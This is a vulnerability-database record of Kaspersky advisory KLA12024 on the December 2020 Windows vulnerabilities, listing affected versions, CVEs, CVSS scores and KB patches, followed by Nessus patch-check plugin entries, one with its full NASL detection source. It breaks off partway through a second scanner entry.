DATABASE RESOURCES PRICING ABOUT US

{"id": "KLA12024", "type": "kaspersky", "bulletinFamily": "info", "title": "KLA12024 Multiple vulnerabilities in Microsoft Windows", "description": "### *Detect date*:\n12/08/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, bypass security restrictions, execute arbitrary code.\n\n### *Affected products*:\nWindows Server, version 2004 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows RT 8.1 \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2012 R2 \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows Server, version 20H2 (Server Core Installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-17103](<https://nvd.nist.gov/vuln/detail/CVE-2020-17103>) \n[CVE-2020-16964](<https://nvd.nist.gov/vuln/detail/CVE-2020-16964>) \n[CVE-2020-16960](<https://nvd.nist.gov/vuln/detail/CVE-2020-16960>) \n[CVE-2020-17140](<https://nvd.nist.gov/vuln/detail/CVE-2020-17140>) \n[CVE-2020-16962](<https://nvd.nist.gov/vuln/detail/CVE-2020-16962>) \n[CVE-2020-16963](<https://nvd.nist.gov/vuln/detail/CVE-2020-16963>) \n[CVE-2020-16961](<https://nvd.nist.gov/vuln/detail/CVE-2020-16961>) \n[CVE-2020-17099](<https://nvd.nist.gov/vuln/detail/CVE-2020-17099>) \n[CVE-2020-17098](<https://nvd.nist.gov/vuln/detail/CVE-2020-17098>) \n[CVE-2020-17097](<https://nvd.nist.gov/vuln/detail/CVE-2020-17097>) \n[CVE-2020-17096](<https://nvd.nist.gov/vuln/detail/CVE-2020-17096>) \n[CVE-2020-17095](<https://nvd.nist.gov/vuln/detail/CVE-2020-17095>) \n[CVE-2020-17094](<https://nvd.nist.gov/vuln/detail/CVE-2020-17094>) \n[CVE-2020-17092](<https://nvd.nist.gov/vuln/detail/CVE-2020-17092>) \n[CVE-2020-17138](<https://nvd.nist.gov/vuln/detail/CVE-2020-17138>) \n[CVE-2020-17139](<https://nvd.nist.gov/vuln/detail/CVE-2020-17139>) \n[CVE-2020-17134](<https://nvd.nist.gov/vuln/detail/CVE-2020-17134>) \n[CVE-2020-17136](<https://nvd.nist.gov/vuln/detail/CVE-2020-17136>) \n[CVE-2020-17137](<https://nvd.nist.gov/vuln/detail/CVE-2020-17137>) \n[CVE-2020-16996](<https://nvd.nist.gov/vuln/detail/CVE-2020-16996>) \n[CVE-2020-16959](<https://nvd.nist.gov/vuln/detail/CVE-2020-16959>) \n[CVE-2020-16958](<https://nvd.nist.gov/vuln/detail/CVE-2020-16958>) \n[ADV200013](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/ADV200013>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2020-17103](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17103>)7.2High \n[CVE-2020-16964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16964>)7.2High \n[CVE-2020-16960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16960>)7.2High \n[CVE-2020-17140](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17140>)4.0Warning \n[CVE-2020-16962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16962>)7.2High \n[CVE-2020-16963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16963>)7.2High \n[CVE-2020-16961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16961>)7.2High \n[CVE-2020-17099](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17099>)4.6Warning \n[CVE-2020-17098](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17098>)2.1Warning \n[CVE-2020-17097](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17097>)4.6Warning \n[CVE-2020-17096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17096>)9.0Critical \n[CVE-2020-17095](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17095>)9.0Critical \n[CVE-2020-17094](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17094>)2.1Warning \n[CVE-2020-17092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17092>)7.2High \n[CVE-2020-17138](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17138>)2.1Warning \n[CVE-2020-17139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17139>)4.6Warning \n[CVE-2020-17134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17134>)4.6Warning \n[CVE-2020-17136](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17136>)4.6Warning \n[CVE-2020-17137](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17137>)4.6Warning \n[CVE-2020-16996](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16996>)4.0Warning \n[CVE-2020-16959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16959>)7.2High \n[CVE-2020-16958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16958>)7.2High\n\n### *KB list*:\n[4592449](<http://support.microsoft.com/kb/4592449>) \n[4592440](<http://support.microsoft.com/kb/4592440>) \n[4592438](<http://support.microsoft.com/kb/4592438>) \n[4592484](<http://support.microsoft.com/kb/4592484>) \n[4593226](<http://support.microsoft.com/kb/4593226>) \n[4592495](<http://support.microsoft.com/kb/4592495>) \n[4592497](<http://support.microsoft.com/kb/4592497>) \n[4592446](<http://support.microsoft.com/kb/4592446>) \n[4592464](<http://support.microsoft.com/kb/4592464>) \n[4592468](<http://support.microsoft.com/kb/4592468>) \n[5000822](<http://support.microsoft.com/kb/5000822>) \n[5000847](<http://support.microsoft.com/kb/5000847>) \n[5000808](<http://support.microsoft.com/kb/5000808>) \n[5000803](<http://support.microsoft.com/kb/5000803>) \n[5000848](<http://support.microsoft.com/kb/5000848>) \n[5000802](<http://support.microsoft.com/kb/5000802>) \n[5000853](<http://support.microsoft.com/kb/5000853>) \n[5000840](<http://support.microsoft.com/kb/5000840>)\n\n### *Microsoft official advisories*:", "published": "2020-12-08T00:00:00", "modified": "2021-03-24T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.9, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA12024/", "reporter": "Kaspersky Lab", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2020-17103", "https://nvd.nist.gov/vuln/detail/CVE-2020-16964", "https://nvd.nist.gov/vuln/detail/CVE-2020-16960", "https://nvd.nist.gov/vuln/detail/CVE-2020-17140", "https://nvd.nist.gov/vuln/detail/CVE-2020-16962", "https://nvd.nist.gov/vuln/detail/CVE-2020-16963", "https://nvd.nist.gov/vuln/detail/CVE-2020-16961", "https://nvd.nist.gov/vuln/detail/CVE-2020-17099", "https://nvd.nist.gov/vuln/detail/CVE-2020-17098", "https://nvd.nist.gov/vuln/detail/CVE-2020-17097", "https://nvd.nist.gov/vuln/detail/CVE-2020-17096", "https://nvd.nist.gov/vuln/detail/CVE-2020-17095", "https://nvd.nist.gov/vuln/detail/CVE-2020-17094", "https://nvd.nist.gov/vuln/detail/CVE-2020-17092", "https://nvd.nist.gov/vuln/detail/CVE-2020-17138", "https://nvd.nist.gov/vuln/detail/CVE-2020-17139", "https://nvd.nist.gov/vuln/detail/CVE-2020-17134", "https://nvd.nist.gov/vuln/detail/CVE-2020-17136", "https://nvd.nist.gov/vuln/detail/CVE-2020-17137", "https://nvd.nist.gov/vuln/detail/CVE-2020-16996", "https://nvd.nist.gov/vuln/detail/CVE-2020-16959", "https://nvd.nist.gov/vuln/detail/CVE-2020-16958", "https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/ADV200013", "https://threats.kaspersky.com/en/product/Microsoft-Windows/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-8/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-7/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2008/", "https://threats.kaspersky.com/en/product/Windows-RT/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-10/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17103", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16964", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16960", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17140", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16962", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16963", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16961", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17099", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17098", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17097", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17096", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17095", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17094", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17092", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17138", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17139", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17134", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17136", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17137", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16959", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16958", "http://support.microsoft.com/kb/4592449", "http://support.microsoft.com/kb/4592440", "http://support.microsoft.com/kb/4592438", "http://support.microsoft.com/kb/4592484", "http://support.microsoft.com/kb/4593226", "http://support.microsoft.com/kb/4592495", "http://support.microsoft.com/kb/4592497", "http://support.microsoft.com/kb/4592446", "http://support.microsoft.com/kb/4592464", "http://support.microsoft.com/kb/4592468", "http://support.microsoft.com/kb/5000822", "http://support.microsoft.com/kb/5000847", "http://support.microsoft.com/kb/5000808", "http://support.microsoft.com/kb/5000803", "http://support.microsoft.com/kb/5000848", "http://support.microsoft.com/kb/5000802", "http://support.microsoft.com/kb/5000853", "http://support.microsoft.com/kb/5000840", "https://portal.msrc.microsoft.com/en-us/security-guidance", "https://statistics.securelist.com/vulnerability-scan/month"], "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17137", "CVE-2020-17138", "CVE-2020-17139", "CVE-2020-17140"], "immutableFields": [], "lastseen": "2021-08-18T10:59:19", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:33F83CEA-850A-43CD-8CA4-D0DC548F1958"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1250", "CPAI-2020-1272"]}, {"type": "cve", "idList": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17137", "CVE-2020-17138", "CVE-2020-17139", "CVE-2020-17140"]}, {"type": "githubexploit", "idList": ["DAF55AA9-F00A-533A-A843-3EC20DDE6BD0"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:1D4D205F47235FA1B34F16AE73563B14"]}, {"type": "ibm", "idList": ["F34133DBAC4F6FEF866DB845BED95244FB18E8AD56C9EDC4C9EFFFDFD49046C8"]}, {"type": "kaspersky", "idList": ["KLA12025"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_17136-"]}, {"type": "mscve", "idList": ["MS:CVE-2020-16958", "MS:CVE-2020-16959", "MS:CVE-2020-16960", "MS:CVE-2020-16961", "MS:CVE-2020-16962", "MS:CVE-2020-16963", "MS:CVE-2020-16964", "MS:CVE-2020-16996", "MS:CVE-2020-17092", "MS:CVE-2020-17094", "MS:CVE-2020-17095", "MS:CVE-2020-17096", "MS:CVE-2020-17097", "MS:CVE-2020-17098", "MS:CVE-2020-17099", "MS:CVE-2020-17103", "MS:CVE-2020-17134", "MS:CVE-2020-17136", "MS:CVE-2020-17137", "MS:CVE-2020-17138", "MS:CVE-2020-17139", "MS:CVE-2020-17140"]}, {"type": "mskb", "idList": ["KB4592446", "KB4592464", "KB4592468", "KB4592471", "KB4592484", "KB4592495", "KB4592497", "KB4592498", "KB4592503", "KB4592504", "KB4593226"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_DEC_4586793.NASL", "SMB_NT_MS20_DEC_4586830.NASL", "SMB_NT_MS20_DEC_4592438.NASL", "SMB_NT_MS20_DEC_4592446.NASL", "SMB_NT_MS20_DEC_4592449.NASL", "SMB_NT_MS20_DEC_4592464.NASL", "SMB_NT_MS20_DEC_4592468.NASL", "SMB_NT_MS20_DEC_4592471.NASL", "SMB_NT_MS20_DEC_4592484.NASL", "SMB_NT_MS20_DEC_4592498.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160919"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D6BB8795D96ECAD5C95596F19210BB13"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0165B62C20478239D1C1B73C779FA6F0", "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080"]}, {"type": "thn", "idList": ["THN:BCD236457064C9D8673B1536BE370718"]}, {"type": "threatpost", "idList": ["THREATPOST:02914A68EEB34D94544D5D00BF463BAC"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-16996"]}, {"type": "zdt", "idList": ["1337DAY-ID-35669"]}]}, "score": {"value": 3.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:33F83CEA-850A-43CD-8CA4-D0DC548F1958"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1250", "CPAI-2020-1272"]}, {"type": "cve", "idList": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17137", "CVE-2020-17138", "CVE-2020-17139", "CVE-2020-17140"]}, {"type": "githubexploit", "idList": ["DAF55AA9-F00A-533A-A843-3EC20DDE6BD0"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:1D4D205F47235FA1B34F16AE73563B14"]}, {"type": "ibm", "idList": ["F34133DBAC4F6FEF866DB845BED95244FB18E8AD56C9EDC4C9EFFFDFD49046C8"]}, {"type": "kaspersky", "idList": ["KLA12025"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2020-16963/", "MSF:ILITIES/MSFT-CVE-2020-16964/", "MSF:ILITIES/MSFT-CVE-2020-17103/"]}, {"type": "mscve", "idList": ["MS:CVE-2020-16958", "MS:CVE-2020-16959", "MS:CVE-2020-16960", "MS:CVE-2020-16961", "MS:CVE-2020-16962", "MS:CVE-2020-16963", "MS:CVE-2020-16964", "MS:CVE-2020-16996", "MS:CVE-2020-17092", "MS:CVE-2020-17094", "MS:CVE-2020-17095", "MS:CVE-2020-17096", "MS:CVE-2020-17097", "MS:CVE-2020-17098", "MS:CVE-2020-17099", "MS:CVE-2020-17103", "MS:CVE-2020-17134", "MS:CVE-2020-17136", "MS:CVE-2020-17137", "MS:CVE-2020-17138", "MS:CVE-2020-17139", "MS:CVE-2020-17140"]}, {"type": "mskb", "idList": ["KB4592503"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_DEC_4592471.NASL", "SMB_NT_MS20_DEC_4592498.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160919"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D6BB8795D96ECAD5C95596F19210BB13"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0165B62C20478239D1C1B73C779FA6F0", "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080"]}, {"type": "thn", "idList": ["THN:BCD236457064C9D8673B1536BE370718"]}, {"type": "threatpost", "idList": ["THREATPOST:02914A68EEB34D94544D5D00BF463BAC"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-16996"]}, {"type": "zdt", "idList": ["1337DAY-ID-35669"]}]}, "exploitation": null, "vulnersScore": 3.3}, "_state": {"dependencies": 1660004461, "score": 1660009287}, "_internal": {"score_hash": "e1a7c5a4fe76ab818dce9859aeea042e"}}

{"nessus": [{"lastseen": "2022-06-23T15:14:29", "description": "The remote Windows host is missing security update 4592438.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17095, CVE-2020-17096)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2020-17131)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17094, CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-17139)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097, CVE-2020-17103, CVE-2020-17134, CVE-2020-17136, CVE-2020-17137)", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592438: Windows 10 Version 2004 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17103", "CVE-2020-17131", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17137", "CVE-2020-17139", "CVE-2020-17140"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592438.NASL", "href": "https://www.tenable.com/plugins/nessus/143558", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143558);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17094\",\n \"CVE-2020-17095\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17103\",\n \"CVE-2020-17131\",\n \"CVE-2020-17134\",\n \"CVE-2020-17136\",\n \"CVE-2020-17137\",\n \"CVE-2020-17139\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592438\");\n script_xref(name:\"MSFT\", value:\"MS20-4592438\");\n script_xref(name:\"IAVA\", value:\"2020-A-0555\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592438: Windows 10 Version 2004 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592438.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17095,\n CVE-2020-17096)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2020-17131)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17094, CVE-2020-17098,\n CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-17139)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097,\n CVE-2020-17103, CVE-2020-17134, CVE-2020-17136,\n CVE-2020-17137)\");\n # https://support.microsoft.com/en-us/help/4592438/windows-10-update-kb4592438\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1f576e6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4592438.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-17095\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592438');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592438])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:13:53", "description": "The remote Windows host is missing security update 4592440. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097, CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17095, CVE-2020-17096)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17094, CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-16996, CVE-2020-17099, CVE-2020-17139)", "cvss3": {"score": 9.9, 